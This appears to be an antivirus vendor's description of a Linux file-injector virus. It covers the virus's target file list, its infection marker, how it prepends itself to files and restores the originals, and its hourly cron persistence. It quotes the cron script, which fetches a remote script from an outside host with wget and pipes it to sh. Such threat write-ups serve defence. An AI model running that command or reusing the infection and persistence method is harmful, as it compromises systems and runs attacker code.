A file injector for Linux. It infects files according to the following list:
"ssdp"
"ssyn"
"udp"
"essyn"
"xmlrpc"
"ovh"
"xsyn"
"Installer"
"installer"
"50x"
"sdns"
"sudp"
"sx"
"scan"
"ddos"
"joomla"
"/bin/ls"
"a.out"
"x.pl"
"udp.pl"
This virus tries to open a file from the list, loads it into the memory and searches for the line “Good luck, Ebola-chan!”. If the line is found, the malicious program goes to the next file. Otherwise, the virus records its body into the file, and then records the original file content. When launching the infected file, this malware saves the original one into the /tmp/ folder and launches it. Once the original file is executed, a file injector removes it from the folder.
Using the Cron (/etc/cron.hourly/0) service, the virus schedules the task to execute the following script in 1-hour intervals:
#!/bin/sh
wget http://cf0.pw/0/etc/cron.hourly/0 -O- 2>dev/null|sh>dev/null 2>&1
The downloaded file is a sh-script designed to run on the infected machine.